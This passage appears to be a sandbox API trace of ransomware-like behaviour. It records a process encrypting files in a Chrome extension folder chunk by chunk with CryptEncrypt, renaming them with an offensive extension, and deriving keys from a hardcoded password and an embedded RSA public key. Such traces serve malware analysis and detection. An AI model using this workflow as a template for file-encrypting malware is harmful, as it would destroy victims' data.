lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.521] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.521] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.522] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.522] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.522] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.522] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.522] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.522] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.522] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.523] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.523] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.523] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.523] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.523] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.523] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.523] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.524] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.524] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.524] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.524] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.524] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.524] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.525] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.525] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.525] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.525] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.525] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.525] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x35a, lpOverlapped=0x0) returned 1 [0261.525] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x35a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x360) returned 1 [0261.525] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x360, lpOverlapped=0x0) returned 1 [0261.525] CloseHandle (hObject=0x5d60) returned 1 [0261.525] CloseHandle (hObject=0x5d64) returned 1 [0261.526] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), bFailIfExists=0) returned 1 [0261.537] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js", dwFileAttributes=0x0) returned 1 [0261.537] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.gsg")) returned 1 [0261.539] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.fuck")) returned 1 [0261.540] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.540] CryptDestroyKey (hKey=0x2e7df40) returned 1 [0261.540] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.540] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0261.540] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0261.540] GetLastError () returned 0x0 [0261.540] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js")) returned 0x20 [0261.541] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js", dwFileAttributes=0x80) returned 1 [0261.541] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.542] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0261.543] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.gsg", dwFileAttributes=0x2) returned 1 [0261.543] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0261.564] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0261.564] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.564] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.564] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7dc80) returned 1 [0261.565] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.565] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0261.565] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e71a58) returned 1 [0261.565] 